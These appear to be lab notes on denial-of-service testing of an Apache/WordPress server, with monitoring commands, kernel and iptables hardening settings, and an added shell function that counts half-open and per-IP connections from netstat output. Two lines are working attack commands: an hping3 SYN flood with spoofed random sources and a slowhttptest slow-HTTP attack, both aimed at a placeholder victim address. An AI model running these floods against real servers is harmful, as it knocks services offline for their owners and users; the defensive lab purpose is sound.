DoS Attack

Connect via SSH and monitor

Connect to ssh..

Vital Checks

top

Check Half-Open Connection Counter (hping3)

netstat -ant | grep SYN_RECV | wc -l

Check the Connection ESTABLISHED counter (slowhttptest)

netstat -ant | grep ESTABLISHED | wc -l

Restart Apache2

sudo service apache2 restart

hping3

sudo hping3 --flood --rand-source -S -p 80 <IP-Victim>

Prevent DoS: edit sysctl.conf

sudo vim /etc/sysctl.conf

Add these lines:

net.ipv4.conf.default.rp_filter=1
net.ipv4.conf.all.rp_filter=1
net.ipv4.tcp_max_syn_backlog=256
net.ipv4.tcp_synack_retries=2
net.core.netdev_max_backlog=2500

Activate SYN cookies

sudo sysctl net.ipv4.tcp_syncookies=1

Protect against IP spoofing (reverse-path filtering)

sudo sysctl net.ipv4.conf.default.rp_filter=1
sudo sysctl net.ipv4.conf.all.rp_filter=1

Limit SYN-ACK retries (default = 5)

sudo sysctl net.ipv4.tcp_synack_retries=2

Increase the size of the queue for received packets

sudo sysctl net.core.netdev_max_backlog=2500

Disable acceptance of ICMP redirect packets (prevents MITM)

sudo sysctl net.ipv4.conf.all.accept_redirects=0

Load the settings from /etc/sysctl.conf without rebooting

sudo sysctl -p

slowhttptest

slowhttptest -c 1000 -H -g -o slow_stats -i 10 -r 200 -t GET -u http://<IP-Victim>/wordpress/ -x 24 -p 3

Limit HTTP connections per IP

sudo iptables -I INPUT 1 -p tcp --dport 80 -m connlimit --connlimit-above 20 -j REJECT --reject-with tcp-reset
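Added example, not part of the original notes: a shell function that combines the two netstat checks above and lists the remote addresses holding more ESTABLISHED connections to the web port than a given limit, which helps judge who the connlimit rule would affect. The names conn_summary and sample_netstat are hypothetical, the sample output is constructed (documentation addresses only), and counting only ESTABLISHED sockets is an approximation of what connlimit tracks.

```sh
#!/bin/sh
# conn_summary PORT LIMIT   (reads `netstat -ant` text on stdin)
# Prints "syn_recv=<n> established=<n>" for connections to local PORT, then
# one "over_limit <ip> <count>" line per remote address holding more than
# LIMIT ESTABLISHED connections to that port.
conn_summary() {
    awk -v port="$1" -v limit="$2" '
        $1 ~ /^tcp/ {
            # Columns: proto recv-q send-q local-addr remote-addr state
            n = split($4, l, ":")          # last field is the local port
            if (l[n] != port) next
            if ($6 == "SYN_RECV") syn++    # half-open (SYN flood indicator)
            if ($6 == "ESTABLISHED") {     # held open (slow HTTP indicator)
                est++
                rip = $5
                sub(/:[0-9]+$/, "", rip)   # strip the remote port
                per_ip[rip]++
            }
        }
        END {
            printf "syn_recv=%d established=%d\n", syn, est
            for (ip in per_ip)
                if (per_ip[ip] > limit)
                    printf "over_limit %s %d\n", ip, per_ip[ip]
        }'
}

# Constructed sample of `netstat -ant` output for offline testing.
sample_netstat() {
    cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 203.0.113.5:80          198.51.100.7:40112      SYN_RECV
tcp        0      0 203.0.113.5:80          198.51.100.93:1890      SYN_RECV
tcp        0      0 203.0.113.5:80          192.0.2.10:51000        ESTABLISHED
tcp        0      0 203.0.113.5:80          192.0.2.10:51001        ESTABLISHED
tcp        0      0 203.0.113.5:80          192.0.2.10:51002        ESTABLISHED
tcp        0      0 203.0.113.5:80          192.0.2.44:40000        ESTABLISHED
tcp        0      0 203.0.113.5:22          192.0.2.44:40001        ESTABLISHED
EOF
}

# Live use on the monitored server: netstat -ant | conn_summary 80 20
```

With --rand-source floods the SYN_RECV total rises while no single address crosses the per-IP limit, so the two numbers should be read together.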

Check iptables contents